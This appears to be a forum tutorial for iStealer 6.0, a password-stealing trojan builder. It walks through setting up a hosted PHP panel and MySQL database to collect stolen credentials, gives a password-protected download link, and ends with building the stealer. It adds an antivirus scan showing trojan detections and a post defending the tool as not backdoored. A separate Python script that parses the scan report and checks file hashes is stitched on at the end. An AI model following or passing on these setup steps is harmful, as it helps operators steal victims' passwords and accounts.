Tutorial IStealer 6.0

STEP 1:
First, we will need to set up the PHP panel. To do that, we need a hosting website.

I suggest this one:
http://www.blackapplehost.com/

Click Register to make a new account.

STEP 2:
When you have finished registering, go to UserCP.
Then you will need to create a new MySQL database by clicking Create/delete MySQL database.

Now name your database, for example "database".
My username is username131, so the database name would be database_username131 and the password passw0rxz123. Now click Create Database.

In the Assign Privileges panel, select your database's Username & Database.Table name and check all boxes.

STEP 3:
Now we need to download iStealer and set up the PHP.
To download iStealer 6.0: http://www.multiupload.com/WK0DX467P3
Password: guardianangel

SS : http://yfrog.com/3mistelar60p

STEP 4:
Now we will need to set up the PHP file. Right-click on index, click Open with... and select Notepad or some other text editor.
Now I will use my username, password & database to show you how to set it up correctly (you can find the info at the top).

SS : http://i45.tinypic.com/vzbyg7.png

And save it.

STEP 5:
Now go back to the BlackApple Hosting website, press File Manager and upload the index.php & style.css files.

STEP 6:
Open iStealer 6.0 when you have finished uploading index.php & style.css.

Your URL would be something like this:
http://username.blackapplehost.com/index.php

Mine is:

SS : http://i47.tinypic.com/10wptg8.png

Now click Build & that's all. Hope you like it, and please leave a comment.
---------------------------------------------------------------------------------------
Scan results:
File Info
Report date: 10.2.2010 at 16.32.21 (GMT 1)
File name: iStealer.exe
File size: 905728 bytes
MD5 Hash: 4d8c22253a41bbbbe086e16f57eafca6
SHA1 Hash: A96315F66F0B82A805E835BC2A866FCCD7980176
Detection rate: 7 on 20
Status: INFECTED

Detections

a-squared - Trojan-PWS.Win32.Dybalom!IK
Avira AntiVir - TR/Crypt.ZPACK.Gen
Avast - Win32:Malware-gen
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - Trojan-PWS.Win32.Dybalom
Kaspersky - Trojan-PSW.Win32.Dybalom.bkn
McAfee - Generic.dx!nii trojan
NOD32 - Win32/PSW.Fignotok.B
Panda - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

There is no backdoor in this program,
not like what he gossiped.
I've talked to gosu and Endonium.
Endonium says: I'm not even going to bother reading all the retarded answers that have been made by everyone.

This is NOT backdoored.

Now, let's address a few points.

First of all: A FULL 3-hour data packet and traffic analysis brought up NOTHING at all. There is NOTHING that goes in and out of the system. I personally tested this and I'm pretty sure I'm actually the one who did it the most fully.

It was done on a three-computer network, all of them running Wireshark. Now you'll tell me this has anti-Wireshark functions. It most surely does. But it has these functions for the computer it's being run from. One of my computers acts as a router for the rest of them and receives the same data traffic as the others. I analyzed everything going in and out of my whole network; nothing pulled through.

That's this addressed. From there, you can already say it's not backdoored.

BUT:
Secondly: The server creator (aka main program) generates 2 files when being launched.
One of them is a .dll file that gets thrown in the system folder. This file is already present in the IS folder and is hidden. A few analyses of this file will teach you that it's often associated with trojan programs. (Wow, NEWS for you ... IS is a virus and a trojan).
This .dll NEVER gets executed, NEVER gets registered. NEVER EVER. A simple tool such as Comodo in Paranoid mode will show you this, and it can't be hidden from the system.

Another file is the music file. It also gets dumped in the system folder, and will appear in the IS folder. This file also NEVER EVER gets executed in any way. It's not downloaded from an obscure source as some have pretended; it's generated by the IS program itself. Some say it's a WMP playlist exploit. So, you're going to be dumb enough to click on it? It's an OLD exploit at best and doesn't work anymore. It doesn't get registered into any registry key for auto launch, it doesn't get registered anywhere for that matter and doesn't get executed.

Number 3: [file and pathname of the sample #1], 905 728 bytes, MD5: 0x4D8C22253A41BBBBE086E16F57EAFCA6, SHA-1: 0xA96315F66F0B82A805E835BC2A866FCCD7980176. This is going to be your server. Use your brains. It has the same MD5 as your main program.

This version released by Gosu is NOT backdoored. There is NO evidence at all supporting that, and if anyone has any doubt, I invite them to do themselves a full network analysis if they have the means for it.

It's 100% clean. This bullshit needs to stop...!!
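The scan report above and Endonium's third point both rest on the same two checks a triager would actually run: reading a multi-engine detection table to see how many engines flag the file, and comparing a file's computed digests against the published MD5/SHA-1. The Python below is an added example, not code from the page or from any scanner it names. It parses the report block exactly as quoted on the page, recomputes the detection rate and checks it against the "7 on 20" header, and normalises the two hash spellings the page uses (the report's lowercase digest and the forum post's 0x-prefixed uppercase one) so either can be compared with a locally computed hash. The bytes it hashes at the end are a constructed stand-in, not the real sample, so the match correctly comes back false; the same function run on an actual file is how you would confirm or refute the "same MD5" claim.

```python
import hashlib
import re

# Copy of the multi-engine report as quoted on the page (header fields and the
# "Detections" block), embedded here so the example runs offline.
SCAN_REPORT = """File name: iStealer.exe
File size: 905728 bytes
MD5 Hash: 4d8c22253a41bbbbe086e16f57eafca6
SHA1 Hash: A96315F66F0B82A805E835BC2A866FCCD7980176
Detection rate: 7 on 20
Status: INFECTED

Detections

a-squared - Trojan-PWS.Win32.Dybalom!IK
Avira AntiVir - TR/Crypt.ZPACK.Gen
Avast - Win32:Malware-gen
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - Trojan-PWS.Win32.Dybalom
Kaspersky - Trojan-PSW.Win32.Dybalom.bkn
McAfee - Generic.dx!nii trojan
NOD32 - Win32/PSW.Fignotok.B
Panda - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
"""


def normalize_hash(value: str) -> str:
    """Lower-case a hex digest and drop an optional 0x prefix so that the
    forum post's '0x4D8C...' and the report's '4d8c...' compare equal."""
    value = value.strip()
    if value.lower().startswith("0x"):
        value = value[2:]
    return value.lower()


def parse_report(text: str) -> dict:
    """Split the report into header fields and a vendor -> detection map.
    A bare '-' after the vendor name means that engine reported nothing."""
    header, _, body = text.partition("Detections")
    fields = {}
    for line in header.splitlines():
        if ":" in line:
            key, val = line.split(":", 1)
            fields[key.strip()] = val.strip()
    detections = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        vendor, _, name = line.rpartition(" - ")
        detections[vendor] = None if name == "-" else name
    return {"fields": fields, "detections": detections}


def detection_rate(report: dict) -> tuple:
    """(engines that flagged the file, engines consulted)."""
    hits = sum(1 for name in report["detections"].values() if name)
    return hits, len(report["detections"])


def rate_matches_header(report: dict) -> bool:
    """Recompute the rate from the table and compare with the 'N on M' field."""
    m = re.match(r"(\d+)\s+on\s+(\d+)", report["fields"].get("Detection rate", ""))
    if not m:
        return False
    return detection_rate(report) == (int(m.group(1)), int(m.group(2)))


def compute_hashes(data: bytes) -> dict:
    """MD5 and SHA-1 of the given bytes, lowercase hex."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
    }


def file_matches_report(data: bytes, report: dict) -> bool:
    """True only if both digests of `data` equal the report's published values."""
    got = compute_hashes(data)
    want_md5 = normalize_hash(report["fields"]["MD5 Hash"])
    want_sha1 = normalize_hash(report["fields"]["SHA1 Hash"])
    return got["md5"] == want_md5 and got["sha1"] == want_sha1


if __name__ == "__main__":
    report = parse_report(SCAN_REPORT)
    hits, total = detection_rate(report)
    print(f"{hits} of {total} engines flagged the file; header consistent: "
          f"{rate_matches_header(report)}")
    # Constructed stand-in bytes, not the real sample: expect no match.
    print("matches report:", file_matches_report(b"constructed stand-in", report))
```

Requiring both digests to match, rather than MD5 alone, is deliberate: MD5 collisions are practical, so an MD5-only match is weaker evidence than the post treats it as, while an MD5 and SHA-1 pair agreeing with the report is good evidence the file on disk is the one that was scanned.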
